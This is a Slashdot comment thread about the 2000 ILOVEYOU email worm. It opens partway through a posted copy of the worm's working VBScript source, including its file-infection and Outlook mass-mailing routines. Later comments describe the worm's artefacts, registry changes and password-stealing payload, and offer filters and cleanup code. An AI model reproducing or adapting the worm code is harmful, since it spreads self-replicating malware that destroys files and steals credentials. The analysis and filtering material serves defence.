    dim f,f1,sf
    set f = fso.GetFolder(folderspec)
    set sf = f.SubFolders
    for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
    next
    end sub
    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite regkey,regvalue
    end sub
    function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget=regedit.RegRead(value)
    end function
    function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    sub spreadtoemail()
    On Error Resume Next
    dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
    set regedit=CreateObject("WScript.Shell")
    set out=WScript.CreateObject("Outlook.Application")
    set mapi=out.GetNameSpace("MAPI")
    for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software \Microsoft\WAB\"&a)
    if (regv="") then
    regv=1
    end if
    if (int(a.AddressEntries.Count)>int(regv)) then
    for ctrentries=1 to a.AddressEntries.Count
    malead=a.AddressEntries(x)
    regad=""
    regad=regedit.RegRead("HKEY_CURRENT_USER\Softwar e\Microsoft\WAB\"&malead)
    if (regad="") then
    set male=out.CreateItem(0)
    male.Recipients.Add(malead)
    male.Subject = "ILOVEYOU"
    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
    male.Send
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
    end if
    x=x+1
    next
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
    else
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
    end if
    next
    Set out=Nothing
    Set mapi=Nothing
    end sub
    sub html
    On Error Resume Next
    dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
    dta1="LOVELETTER - HTML"&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    "

    This HTML file need ActiveX Control

    To Enable to read this HTML file
    - Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
    "----------z--------------------z---------- "&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""
    dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
    dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
    dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
    dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
    dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
    dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
    dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
    dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
    set fso=CreateObject("Scripting.FileSystemObject")
    set c=fso.OpenTextFile(WScript.ScriptFullName,1)
    lines=Split(c.ReadAll,vbcrlf)
    l1=ubound(lines)
    for n=0 to ubound(lines)
    lines(n)=replace(lines(n),"'",chr(91)+chr(45)+ch r(91))
    lines(n)=replace(lines(n),"""",chr(93)+chr(45)+c hr(93))
    lines(n)=replace(lines(n),"\",chr(37)+chr(45)+ch r(37))
    if (l1=n) then
    lines(n)=chr(34)+lines(n)+chr(34)
    else
    lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
    end if
    next
    set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM")
    b.close
    set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2)
    d.write dt5
    d.write join(lines,vbcrlf)
    d.write vbcrlf
    d.write dt6
    d.close
    end sub

  21. Linux version by hoss10 · · Score: 2
    > Pine/Elm/Mutt users as always laugh maniacally
    Stop being so arrogant. It's just an executable attachment.

    For a linux version just write a bash script that'll read the users address book and send it on as well.

    This is one reason NOT to want world domination. In that case it'll spread easily

    ------------------------------------------------ -
    "If I can shoot rabbits then I can shoot fascists" -

    1. Re:Linux version by John+Fulmer · · Score: 2

      > Stop being so arrogant. It's just an executable
      > attachment.

      Er, yes, but Pine/Elm/Mutt etc, do not run attachments automatically, don't include a programming language within the application itself, and aren't really susceptible to this sort of thing.

      Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, received in e-mail. You certainly wouldn't get this kind of instant mass destruction.

      jf
      (Laughing manically!)

    2. Re:Linux version by ptomblin · · Score: 2

      > Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, received in e-mail. You certainly wouldn't get this kind of instant mass destruction.

      Need I remind you of all the email viruses that spread precisely because people were complete idiots, and ran unknown applications received in email? Take the HAPPY99.EXE virus, for example. My mother (admittedly, a bit dim when it comes to computers) got this one, in spite of having been warned numerous times not to click on these things.

      --
      A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.

      --
      The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
    3. Re:Linux version by weloytty · · Score: 2

      This virus does, in fact, replicate in just the manner you suggest: "you would have to be a COMPLETE idiot to run an unknown shell script"

      That is EXACTLY what is happening. By default, Outlook will NOT run an attachment "automagically". It actually CANNOT be configured to run an attachment automatically, the user HAS to double click it.

    4. Re:Linux version by Rob+Wilderspin · · Score: 2

      If you use the preview pane then Outlook does, in fact, "launch" attachments like JPEGs and VB scripts, so all you have to do is click once on the email itself to run this virus. Very user friendly, very virus friendly.

    5. Re:Linux version by finkployd · · Score: 2

      There are a few problems with this:

      1. Find me a Linux mail client that automatically executes bash scripts when a letter is opened.

      2. The worst that said script could do is delete files in the user's directory (you aren't logged in as root are you?)

      3. Given #2, how would it spread, it cannot modify system files (like sendmail), so the person would have to intentionally send the message.

      So go ahead and write this virus, try to spread it. I bet it goes nowhere.

      Finkployd

    6. Re:Linux version by finkployd · · Score: 2

      That's true, but #1 is still a pretty good defense. As long as Microsoft lookOut isn't ported to linux, we should be ok. :)

      Finkployd

  22. Re:OPening e-mail attachments by slim · · Score: 2

    OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

    As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.

    Now *that* is crappy design...
    --

  23. Microsoft Announcement by Sargent1 · · Score: 3

    Early this morning, in response to the virus, the AP had the following report about Microsoft:

    --

    SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"

    "Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."

    "At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."

    --

    Sargent

    1. Re:Microsoft Announcement by remande · · Score: 2

      Hey...I wonder how hard MS is getting hit with this? Or are they smart enough not to deploy Outlook over their corporate net?

      --

      --The basis of all love is respect

    2. Re:Microsoft Announcement by Black+Parrot · · Score: 2

      > Hey...I wonder how hard MS is getting hit with this? Or are they smart enough not to deploy Outlook over their corporate net?

      Rename it to DOJDROPSLAWSUIT.doc.vbs and see how long msn.com responds to pings.

      --

      --
      Sheesh, evil *and* a jerk. -- Jade
  24. Re:Bad Worm. by BrianW · · Score: 2

    What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.

    I think it's seen as being an easy way evil hackers can get at your machine, especially as people (and the media) don't seem to realise that the user has to open the email - it doesn't happen automatically. And, as an automatic it-comes-from-cyberspace-to-take-over-your-machine virus sounds sufficiently scary, it gets lots of media coverage.

  25. Funniest thing I've read in years! by ToLu+the+Happy+Furby · · Score: 4

    From the MSNBC article:

    "It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."

    Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.

    "I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected."
    (emphasis mine)

    The article even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".

    Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-X11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??

    I mean, I'm joking of course.

    Or at least I think I'm joking...

    1. Re:Funniest thing I've read in years! by Black+Parrot · · Score: 4

      > I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it.

      So, she gets a love letter over a newswire, and that allays her suspicions?

      --

      --
      Sheesh, evil *and* a jerk. -- Jade
  26. disappointed by Duxup · · Score: 2

    My office got it this morning.
    Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.

  27. What a Maron by Zachary+Kessin · · Score: 2
    The guy put his email at the top of the virus

    rem barok -loveletter(vbe)
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

    The Cure of the ills of Democracy is more Democracy.

    --
    Erlang Developer and podcaster
  28. mail server filters by crow · · Score: 2

    I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.

    That should be the standard approach at any site that runs Windows.

  29. Re:OPening e-mail attachments by weloytty · · Score: 2

    Not true.

    The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.

    Of course, your typical unix user probably wouldn't run such a file, but that isn't an application design issue.

  30. Re:Remember to blame Microsoft! by Zagato-sama · · Score: 2

    So let me get this right, Microsoft directly e-mails the virus to you, then goes over to your computer and forcibly opens the attachment? Wow! In that case, can they come over and cook me dinner while they're at it? I'd like roast linux fool, medium rare.

  31. Can't agree with you more. by Pope · · Score: 2

    Our company IT head sent out a Melissa warning at 12am one day. 3am rolled around and I had 3 copies of it already, two from the same person.
    Ahh, the joys of Eudora on a Mac. I just sat back and laughed.

    Pope

    Freedom is Slavery! Ignorance is Strength! Monopolies offer Choice!

    --
    It doesn't mean much now, it's built for the future.
  32. About ILOVEYOU by TomV · · Score: 5
    first up, I don't like the guy's coding style one bit :)

    So what is it and what does it do?

    It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).

    It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()).

    It dicks with the registry to make one of four URLs at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).

    Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.

    Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup

    builds a webpage and displays it, including a request for the user to disable ActiveX security.

    If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.

    Not only don't I like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.

    It's hit 340 lists at our firm so far.

    TomV

    1. Re:About ILOVEYOU by bozone · · Score: 2

      this from securityfocus.com

      "The virus appears to have originated from the Philippines and has been described by one expert as the 'the most beautifully written virus' he's ever seen. "

      some expert...

      --
      "Hatred is the coward's revenge for being intimidated" ...George Bernard Shaw
    2. Re:About ILOVEYOU by ItsIllak · · Score: 2
      first up, I don't like the guy's coding style one bit :)

      Give the guy a break, how are you supposed to go about testing code like this, huh?

      Seriously, apart from removing outlook from computers forcefully, what is the step to stopping this? (and it's impossible to remove it forcefully, try it, get a gun, point it at their heads and ask them to, they will complain)

      I assume a visit to http://windowsupdate.microsoft.com will at least stop it from being run automatically?

    3. Re:About ILOVEYOU by Uri · · Score: 2

      "Replaces any file of types ... mp3 with a copy of itself."

      I bet Metallica wish they'd written this! Wait a minute...

  33. Re:quick fix by SgtPepper · · Score: 2

    This will work, it might delete some legit files but it's better than reinstalling. This thing doesn't appear to be THAT bad. Remain calm and do what the man says.

    does anybody know what the MS-BUGFIX.EXE file /does/ anyway?

  34. I LOVE YOU TOO! by scumdamn · · Score: 2

    Many people in our company received the message, but because of the signs posted everywhere most of us around here didn't open the message. Right now I've got Outlook Express open and logged in to the exchange server through IMAP. I don't know how much that'll help, but I can always hope, can't I? Hell, at least I'm reading the really important email (stuff from my wife) through my ssh session with my server at home. I know Pine isn't susceptible to that shit.

  35. mail for the National Institutes of Health is down by imac.usr · · Score: 2

    since we use Outlook/Exchange for mail after migrating (partially) away from Novell and Groupwise...never mind that there's a large Mac presence at NIH, and the Mac client is way lame and not compatible with the Windows version (yet).

    Some of this was my employer's idea, as well. (The migration, not the virus.)

    Basically, even though 90% of the machines I support are not affected, everybody has to go without mail because they've turned off the Exchange server. I FUCKING FUCKING FUCKING hate Outlook!

    --
    I use Macs for work, Linux for education, and Windows for cardplaying.
  36. REMEMBER! by waldeaux · · Score: 2

    ... you only hurt the ones you love!

  37. LoveLetter worm: the full rundown by RubiCon · · Score: 5

    Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:

    Files created/edited:
    MSKernel32.vbs [created in System folder, copy of worm]
    Win32DLL.vbs [created in Windows folder, copy of worm]
    LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
    LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
    WIN-BUGSFIX.exe [downloaded into default IE download folder]
    WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
    *.vbs, *.vbe [overwritten with copy of worm]
    *.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
    *.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
    *.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
    script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]

    Registry keys created/edited:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 [created to run MSKernel32.vbs]
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL [created to run Win32DLL.vbs]
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
    HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]

    From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).

    I'm not sure about the .exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.

    Other info: the file originates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'
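
A sweep for the file artefacts listed in this rundown and in TomV's summary above, added here as an example (not code from any poster). It is Python, run against a constructed sample tree; the marker string is the worm's first comment line as quoted elsewhere in this thread, the function names and recovery hints are this example's own, and the registry values need a separate check.

```python
import os
import tempfile

# First line of the worm as quoted in this thread; whitespace is normalised before comparing.
MARKER = "rem barok -loveletter(vbe)"
# File names the rundown lists as created or downloaded by the worm.
DROPPED = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
           "love-letter-for-you.htm", "win-bugsfix.exe", "winfat32.exe"}
# Types that get a "<filename>.<ext>.vbs" copy beside or instead of the original.
COMPANION_EXTS = {"jpg", "jpeg", "mp3", "mp2"}


def has_marker(path):
    """True if the file starts with the worm's header comment."""
    try:
        with open(path, "r", errors="replace") as fh:
            head = " ".join(fh.read(4096).lower().split())
    except OSError:
        return False
    return head.startswith(MARKER)


def sweep(root):
    """Return sorted (relative path, kind, action) tuples for artefacts under root."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        present = {f.lower() for f in files}
        for name in files:
            low = name.lower()
            parts = low.split(".")
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if low in DROPPED:
                findings.append((rel, "dropped", "delete file and its Run/RunServices value"))
            elif len(parts) >= 3 and parts[-1] == "vbs" and parts[-2] in COMPANION_EXTS:
                original = low[: -len(".vbs")]
                if original in present:
                    # mp3/mp2 case: the original was only hidden, not destroyed
                    action = "delete copy, clear hidden attribute on " + original
                else:
                    # jpg/jpeg case: the original was overwritten and deleted
                    action = "delete copy, restore " + original + " from backup"
                findings.append((rel, "companion", action))
            elif parts[-1] in ("vbs", "vbe") and has_marker(path):
                # also catches former .js/.css/... files, which reappear as <filename>.vbs
                findings.append((rel, "overwritten", "delete, restore script from backup"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data: placeholder files only, no worm code."""
    fake = MARKER + "\r\n' constructed placeholder\r\n"
    layout = {
        "System/MSKernel32.vbs": fake,
        "Pictures/holiday.jpg.vbs": fake,
        "Music/song.mp3": "not really audio",
        "Music/song.mp3.vbs": fake,
        "Scripts/backup.vbs": fake,
        "Scripts/cleanup.vbs": "WScript.Echo \"legitimate admin script\"\r\n",
        "Docs/readme.txt": "hello",
    }
    for rel, text in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", newline="") as fh:
            fh.write(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, kind, action in sweep(tmp):
            print(f"{kind:12} {rel}: {action}")
```

The companion check separates the recoverable case (hidden .mp3/.mp2 originals) from the destructive one (.jpg/.jpeg originals deleted), which decides whether a backup restore is needed.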

  38. Work is never fun by Cplus · · Score: 2

    Especially when they make you admin NT servers.

    I would imagine that a great number of the /. crew are stuck in the same position as I am, dictated to by corporate or institutional policy. It's not necessarily a matter of coming out of the closet, but of frowning, lowering your head and mumbling about the boss.

    --
    "Share your knowledge. It's a way to achieve immortality." -- Dalai Lama
  39. Umm, okay, I COULD be wrong... by Shoden · · Score: 3

    Just after that previous post, I went to delete those 16 messages from my deleted items folder... as soon as I selected the first message, the preview pane failed to appear. I immediately jumped to the task manager and saw "Virus - Running". I killed that and Outlook, which had stopped responding. As far as I can tell, nothing was sent, and none of my files were changed.

  40. In defense of scripting in mail. by Raindeer · · Score: 3
    A lot of people here are going on about how bad it is that people still use MS-Outlook etc. And how bad it is that they open attachments they don't know of.. That all being as it may, I would like to point out, that the ability to be able to run scripts etc in mail is not necessarily a bad thing, but that this has just been poorly implemented by MS.

    What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used a lot of the VB possibilities you find in Office. They especially built a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. A lot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)

    What I meant to say was that instead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is a lot safer and gives companies the same ease of use of integrating it into their organisation.

    1. Re:In defense of scripting in mail. by Raindeer · · Score: 2
      No, that is not what I said.. What I said is that the concept is good and that you can do great things with it. What I also said is that I am glad that they cannot be hit by this kind of virus, because of the security policy. Contrary to what some here think, you don't need a 24/7 internet connection to do your job. At this place they implemented the policy not because of MS-products, but because they have to pay 49 billion dutch guilders a year. ($25 billion) They don't want to jeopardize that by opening up their network to the internet. At least not now. As you can see, it makes it quite hard for script-kiddies/e-mail viruses/crackers etc to f*** up their business.

      What I also said is that MS implementation sucks and that there should be a better way of doing this. Somebody suggested to use Lotus, I have no idea if it is better, but maybe somebody can think up an open source alternative.

      You know, one essential part of internet security is that you determine why you want a certain part of the network connected to the Internet (or any network). If you don't know, then maybe you shouldn't.

      What I said was not in defense of MS, but in defense of scripting in mail. I hope now you understand what you read.

  41. Administrator's advice:Training of users by Fats · · Score: 2

    I think System Administrators should send a similar e-mail as this one every once in a while to all their users.
    An unharmful version of it, that is, which only sends a reply back to the administrator. This way, he/she can warn the user for not ever opening anything he/she does not know of.

    Of course, the administrator will have to fake his e-mail addy, but that shouldn't be hard :)

    Just an idea... don't count on the web becoming virus-less... take countermeasures.

  42. TOO BAD by avandesande · · Score: 2

    Too bad MS didn't include antivirus with the OS instead of IE.

    --
    love is just extroverted narcissism
  43. Re:Netscape Messenger by TomV · · Score: 2
    Those of us who use messenger are not immune to this as well

    You'll receive it from Outlook users, it'll mess with a variety of filetypes and offer them on mIRC if you've got it installed, but it won't propagate, since it uses

    CreateObject("Outlook.Application")
    to get at the Address book.

    Open source viruses, eh?

    TomV

  44. Another reason to avoid Msft products... by ch-chuck · · Score: 2

    simply because they've royally pissed off enough technically adept folks and are such a large target - if the DOJ/Courts doesn't take care of their unfair trading practices, the underground assassins will.

    Something along the lines of the devil's dictionary of an absolute monarch: He can do anything he pleases, so long as he pleases the assassins.

    --
    try { do() || do_not(); } catch (JediException err) { yoda(err); }
  45. Definitions by Rupert · · Score: 2

    From the article:

    Visual Basic files used by webmasters

    I feel that anyone calling themselves a master of the web, but who uses VB, probably has some issues.

    --

    --
    E_NOSIG
  46. simple fix by jbarnett · · Score: 3


    There is a really quite simple fix for this, it comes down to basic security that should be practiced at all times. For example, this worm (among others) spreads its disease through the use of the address book in outlook express.

    This address book contains email addresses that the person enjoys sending/receiving email with. You could say, the address contains a list of "friends" to the user. The best way to fix being "labeled" as a "friend" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.

    Also since this is spread through the use of outlook express, which is an email program. Email programs are used to communicate between two users or persons. I can only conclude that communication between humans, in any form is a major security risk and should be stopped.

    The two basic security principles we learned here are

    1) communication between humans is bad and should not be allowed

    2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communications with you.

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  47. More on ZDNet by Rob+Kaper · · Score: 2

    There is an article and already an update.

  48. Re:quick fix by Chris+Hall · · Score: 5
    does anybody know what the MS-BUGFIX.EXE file /does/ anyway?

    I've not looked thoroughly (just a quick look with a disassembler at parts of it), so the following is incomplete, but among other things, it looks as though it can:

    • Remove policies that prevent passwords from getting stored in the registry
    • Watch every 150ms for a window entitled "Connect To", and when found select a checkbox (probably the one to remember passwords, but I've not got DUN installed on this machine, so I can't check)
    • Grab all passwords stored in the registry, plus details of the machine's IP address, and that of any DNS and WINS servers.
    • Connect using SMTP to smtp.super.net.ph, and send these details (and a few more, e.g. username and machine name) to mailme@super.net.ph
    • Do something (not investigated what) with WinFAT32.exe
    • Add policy to disable registry editing
    • Set Internet Explorer's start page to about:blank

    It seems incredibly poorly written. For example, lots of functions return a char* pointing to a local array. Extra padding arrays are added in an attempt to stop the stack from getting overwritten before the value is used.

  49. Tried writing this in MS Word by Analysis+Paralysis · · Score: 5
    Only got as far as the second line when the paper-clip winked at me and asked "It looks like you're writing a virus. Would you like help?"

    Nice to see some innovation at work here...

    Microsoft: Don't Innovate, Regurgitate!

  50. Re:Here is the Visual Basic Script that is "ILOVEY by laborit · · Score: 5

    Oh, great.

    WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.

    The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.

    The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.

    We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.

    --

    -----
    Go ahead, blame me... I voted for Nader!
  51. Re:solution for sendmail? anyone? by Kript · · Score: 2

    our sendmail Guru put the following in our
    /etc/procmailrc:
    :0
    *Subject: (ILOVEYOU|INEEDYOU)
    /home/mail/virus-slr

    :0c

    of course, you may wish to change the location of the file that all the mails are diverted to.
    This will forward all the emails with the subject of ILOVEYOU or INEEDYOU into the file virus-slr.
    so far - it's a 12Mb file!
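
A complementary check to the subject match in the recipe above, added here as an example (not part of the original post): it keys on the attachment name, including the `.TXT.vbs` double-extension disguise, instead of the subject line. It is Python; the extension lists, function names and sample messages are this example's assumptions, and every message is constructed.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Script types named in this thread, plus .exe (assumed site policy, adjust as needed).
EXEC_EXTS = {"vbs", "vbe", "js", "jse", "wsh", "sct", "hta", "exe"}
# Harmless-looking types an executable name may hide behind (assumed list).
DECOY_EXTS = {"txt", "doc", "jpg", "jpeg", "gif", "mp3", "htm", "html"}


def classify_name(filename):
    """Return a reason string for a risky attachment name, or None."""
    # Windows ignores trailing dots and spaces, so "a.vbs. " still opens as .vbs.
    parts = filename.strip().rstrip(". ").lower().split(".")
    if len(parts) < 2 or parts[-1] not in EXEC_EXTS:
        return None
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
        return "executable disguised as ." + parts[-2]
    return "executable attachment ." + parts[-1]


def risky_attachments(raw):
    """Parse raw message bytes; return [(filename, reason)] over all MIME parts."""
    msg = message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.walk():          # walks nested multiparts too
        name = part.get_filename()   # handles RFC 2231 encoded names
        reason = classify_name(name) if name else None
        if reason:
            hits.append((name, reason))
    return hits


def verdict(raw):
    return "quarantine" if risky_attachments(raw) else "deliver"


def subject_rule(raw):
    """Emulates the recipe's condition 'Subject: (ILOVEYOU|INEEDYOU)' on the headers.
    procmail conditions are case-insensitive by default, hence re.I."""
    headers = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0].decode("ascii", "replace")
    return re.search(r"Subject: (ILOVEYOU|INEEDYOU)", headers, re.I) is not None


def build_sample(subject, attachment=None):
    """Constructed test message; the attachment body is a placeholder, not worm code."""
    m = EmailMessage()
    m["From"] = "colleague@example.com"
    m["To"] = "you@example.com"
    m["Subject"] = subject
    m.set_content("constructed sample body")
    if attachment:
        m.add_attachment(b"' placeholder\r\n", maintype="application",
                         subtype="octet-stream", filename=attachment)
    return m.as_bytes()


SAMPLES = {
    "original": build_sample("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "renamed": build_sample("Fwd: letter", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "warning": build_sample("ILOVEYOU warning: do not open it"),
    "benign": build_sample("Meeting notes", "notes.txt"),
}


def compare():
    """Map sample name -> (subject rule fires, attachment verdict)."""
    return {k: (subject_rule(v), verdict(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in compare().items():
        print(name, result)
```

On these samples the subject rule diverts the plain-text warning and passes the copy with a changed subject, while the attachment check does the opposite; running both covers each other's gap.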

  52. Your Sendmail fix works fine by Peter+Millerchip · · Score: 3

    Moderators, please moderate the parent up! Thanks for posting it, it works great. We've now re-enabled external email and it's bounced about a million virus emails so far...

    Pete.

  53. Re:Fixed announced for the ILOVEYOU virus by stx23 · · Score: 2

    You will need to install the evaluation edition of Dr. Solomons, then the extra virus .sig to get it to work, though, but it's a start. Solutions from your favourite AV vendor should be appearing Real Soon Now.
    Now, here's hoping a benevolent moderator passes by and mods the parent of this up where it belongs.

  54. This makes me wonder about Linux.... by Denor · · Score: 2

    This is on topic, but it's going to take me a bit to get to it. Moderators, have faith :)
    One of the reasons that the government thinks it'd be a good thing to break Microsoft up the way they want to, is that without having an OS division, MS-Apps would do things like port Office to Linux.
    Red Hat, among others, sees this as a good thing, since the #1 reason they get for people not wanting to switch over to linux is "I can't use my (.DOC | .XLS | .PPT) files"
    I think about the porting of Office to Linux and see many others adopting Linux as a result. I then see clueless newbies who run as root all the time opening .DOC attachments in their mail, and having a macro virus attack them.
    And if MS-Apps ports Office over, why not Outlook? Right now, most folks think it's fairly rare to see a virus on Linux. If Microsoft ports Office/Outlook over, and clueless newbies/managers get ahold of it, the scarcity of viruses for Linux will vanish.
    I can see the headlines now: "Melissa ported to Linux!"
    I think I'll stick to Pine :)

    --
    -Denor
  55. Consequences... by bero-rh · · Score: 3

    Hm, now that I got a love letter from my boss, can I sue him for sexual harassment and make big cash? ;)

    [Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]

    --
    This message is provided under the terms outlined at http://www.bero.org/terms.html
